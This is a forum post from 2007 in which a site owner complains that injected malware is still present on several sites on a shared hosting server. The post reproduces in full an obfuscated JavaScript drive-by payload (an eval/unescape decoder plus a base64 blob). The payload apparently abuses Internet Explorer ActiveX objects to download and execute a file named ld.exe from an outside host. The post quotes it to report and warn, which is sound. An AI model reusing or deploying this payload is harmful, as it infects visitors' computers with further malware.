Thread: Malware Links on Server
View Single Post
  #3 (permalink)  
Old 03-01-2007, 13:36
DavidAllen's Avatar
DavidAllen DavidAllen is offline
Premium Member
  
Join Date: Jan 2007
Location: Amersham
Posts: 339
Send a message via MSN to DavidAllen Send a message via Skype™ to DavidAllen
Default
The code is still on several website hostings on that server - so the replace command needs re-running.
It doesn't just lead to 'just a image' it leads to a page with another hidden iframe which displays a page (mn.html) with the following code on it:
script language=JavaScript>eval(unescape('var%20codelock_ bas%3D%27ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmno pqrstuvwxyz0123456789%2B%2F%27%3B%20function%20cod elock_dec%28str%29%20%7B%20str%3Dstr.split%28%27%4 0%27%29.join%28%27CAg%27%29%3B%20str%3Dstr.split%2 8%27%21%27%29.join%28%27W5%27%29%3B%20str%3Dstr.sp lit%28%27%2A%27%29.join%28%27CAgI%27%29%3B%20var%2 0bt%2C%20dt%20%3D%20%27%27%3B%20for%28i%3D0%3B%20i %3Cstr.length%3B%20i%20%2B%3D%204%29%20%7B%20bt%20 %3D%20%28codelock_bas.indexOf%28str.charAt%28i%29% 29%20%26%200xff%29%20%3C%3C18%20%7C%20%28codelock_ bas.indexOf%28str.charAt%28i%20%2B1%29%29%20%26%20 0xff%29%20%3C%3C12%20%7C%20%28codelock_bas.indexOf %28str.charAt%28i%20%2B2%29%29%20%26%200xff%29%20% 3C%3C%206%20%7C%20codelock_bas.indexOf%28str.charA t%28i%20%2B3%29%29%20%26%200xff%3B%20dt%20%2B%3D%2 0String.fromCharCode%28%28bt%20%26%200xff0000%29%2 0%3E%3E16%2C%20%28bt%20%26%200xff00%29%20%3E%3E8%2 C%20bt%20%26%200xff%29%3B%20%7D%20if%28str.charCod eAt%28i%20-2%29%20%3D%3D%2061%29%20%7B%20return%28dt.substrin g%280%2C%20dt.length%20-2%29%29%3B%20%7D%20else%20if%28str.charCodeAt%28i% 20-1%29%20%3D%3D%2061%29%20%7B%20return%28dt.substrin g%280%2C%20dt.length%20-1%29%29%3B%20%7D%20else%20%7Breturn%28dt%29%7D%3B% 20%7D')); document.write(codelock_dec('PGh0bWw+DQo8aGVhZD4NC jxzY3JpcHQgdHlwZT0idGV4dC9qYXZhc2NyaXB0IiBsY!ndWFn ZT0iamF2YXNjcmlwdCI+DQp2YXIgaSA9IDA7DQp2YXIgdCA9IG 5ldyBBcnJheSgNCgknQkQ5NkM1NTYtNjVBMy0xMUQwLTk4M0Et MDBDMDRGQzI5RTM2JywNCgknQUI5QkNFREQtRUM3RS00N0UxLT kzMjItRDRBMjEwNjE3MTE2JywNCgknMDAwNkYwMzMtMDAwMC0w MDAwLUMwMDAtMDAwMDAwMDAwMDQ2JywNCgknMDAwNkYwM0EtMD AwMC0wMDAwLUMwMDAtMDAwMDAwMDAwMDQ2JywNCgknNkUzMjA3 MEEtNzY2RC00RUU2LTg3OUMtREMxRkE5MUQyRkMzJywNCgknNj QxNDUxMkItQjk3OC00NTFELUEwRDgtRkNGREYzM0U4MzNDJywN CgknN0Y1QjdGNjMtRjA2Ri00MzMxLThBMjYtMzM5RTAzQzBBRT NEJywNCgknMDY3MjNFMDktRjRDMi00M2M4LTgzNTgtMDlGQ0Qx REIwNzY2JywNCgknNjM5RjcyNUYtMUIyRC00ODMxLUE5RkQtOD c0ODQ3NjgyMDEwJywNCgknQkEwMTg1OTktMURCMy00NGY5LTgz QjQtNDYxNDU0Qzg0QkY4JywNCgknRDBDMDdENTYtN0M2OS00M0 YxLUI0QTAtMjVGNUExMUZBQjE5JywNCgknRThDQ0NEREYtQ0Ey OC00OTZiLUIwNTAtNkMwN0M5NjI0NzZCJw0KKTsNCg0KZnVuY3 Rpb24gZmdyKCkgew0KCXJldHVybiB0cnVlOw0KfQ0Kd2luZG93 Lm9uZXJyb3IgPSBmZ3I7DQoNCmZ1bmN0aW9uIENyZWF0ZU8oby wgbikgew0KCXZhciByID0gbnVsbDsNCgl0cnkgeyBldmFsKCdy ID0gby5DcmVhdGVPYmplY3QobiknKSB9Y2F0Y2goZSl7fQ0KCW lmICghIHIpIHsNCgkJdHJ5IHsgZXZhbCgnciA9IG8uQ3JlYXRl T2JqZWN0KG4sICIiKScpIH1jYXRjaChlKXt9DQoJfQ0KCWlmIC ghIHIpIHsNCgkJdHJ5IHsgZXZhbCgnciA9IG8uQ3JlYXRlT2Jq ZWN0KG4sICIiLCAiIiknKSB9Y2F0Y2goZSl7fQ0KCX0NCglpZi AoISByKSB7DQoJCXRyeSB7IGV2YWwoJ3IgPSBvLkdldE9iamVj dCgiIiwgbiknKSB9Y2F0Y2goZSl7fQ0KCX0NCglpZiAoISByKS B7DQoJCXRyeSB7IGV2YWwoJ3IgPSBvLkdldE9iamVjdChuLCAi IiknKSB9Y2F0Y2goZSl7fQ0KCX0NCglpZiAoISByKSB7DQoJCX RyeSB7IGV2YWwoJ3IgPSBvLkdldE9iamVjdChuKScpIH1jYXRj aChlKXt9DQoJfQ0KCXJldHVybihyKTsJDQp9DQoNCmZ1bmN0aW 9uIERvSXQoKSANCnsgDQoJeC5PcGVuKCdHRVQnLCdodHRwOi8v bW9ydGltZXJjb21wcmVoZ!zaXZlLmNvLnVrL2ltYWdlcy9vcGV ubmlnaHQvdGh1bWJzL3RtcDEvbGQuZXhlJyxmYWxzZSk7DQoJe C5TZ!kKCk7DQoJdmFyIGZuYW1lMSA9ICdtby5jb20nOw0KCXZh ciBmID0gQ3JlYXRlTyh4bWwsJ1NjcmlwdGluZy5GaWxlU3lzdG VtT2JqZWN0Jyk7DQoJdmFyIHRtcCA9IGYuR2V0U3BlY2lhbEZv bGRlcigyKTsNCglmbmFtZTEgPSBmLkJ1aWxkUGF0aCh0bXAsZm 5hbWUxKTsNCglTLm9wZW4oKTsNCglTLndyaXRlKHgucmVzcG9u c2VCb2R5KTsNCglTLnNhdmV0b2ZpbGUoZm5hbWUxLDIpOw0KCV MuY2xvc2UoKTsNCgl2YXIgUSA9IENyZWF0ZU8oeG1sLCdTaGVs bC5BcHBsaWNhdGlvbicpOw0KCVEuU2hlbGxFeGVjdXRlKGZuYW 1lMSwnJywnJywnb3BlbicsMCk7DQp9DQoNCjwvc2NyaXB0Pg0K PC9oZWFkPg0KPGJvZHk+DQo8c2NyaXB0IHR5cGU9InRleHQvam F2YXNjcmlwdCIgbGFuZ3VhZ2U9IkphdmFTY3JpcHQiPg0KaWYg KG5hdmlnYXRvci51c2VyQWdlbnQua!kZXhPZignTVNJRScpICE 9IC0xKSB7DQoJd2hpbGUgKHRbaV0pIHsNCg0KCQl2YXIgeG1sI D0gbnVsbDsNCg0KCQl4bWwgPSBkb2N1bWVudC5jcmVhdGVFbGV tZ!0KCdvYmplY3QnKTsNCgkJeG1sLnNldEF0dHJpYnV0ZSgnY2 xhc3NpZCcsJ2Nsc2lkOkJEOTZDNTU2LTY1QTMtMTFEMC05ODNB LTAwQzA0RkMyOUUzNicpOw0KCQluX3htbCA9ICdNaWNyb3NvZn QuWE1MSFRUUCc7DQoJCXZhciB4ID0geG1sLkNyZWF0ZU9iamVj dChuX3htbCwiIik7DQoJCWExID0gJ0FETyc7DQoJCWEyID0gJ0 RCLic7DQoJCWEzID0gJ1N0cic7DQoJCWE0ID0gJ2VhbSc7DQoJ CXN0cjEgPSBhMSArIGEyICsgYTMgKyBhNDsNCgkJc3RyNSA9IH N0cjE7DQoJCWlmICh4bWwpIHsNCgkgCQl2YXIgUyA9IENyZWF0 ZU8oeG1sLHN0cjUpOw0KCQkJaWYgKFMpIHsNCgkJCQlTLnR5cG UgPSAxOw0KCQkJCXN0cjYgPSAnR0VUJzsNCgkJCQlEb0l0KCk7 DQoJCQl9DQoJCX0NCgl9DQp9DQo8L3NjcmlwdD4NCg0KPC9ib2 R5Pg0KPC9odG1sPg==')); </script>
if you decode that lot you will find that it tries to d/load and execute a file called ld.exe which in turn d/loads further malware!!!

I appreciate you can't tell everyone on the server - but I reported the problem and was left wondering what to do - I had no information about when/if you were running your replace command so had to manually edit all the website hostings I control.

The code is still there on several sites!!!
Reply With Quote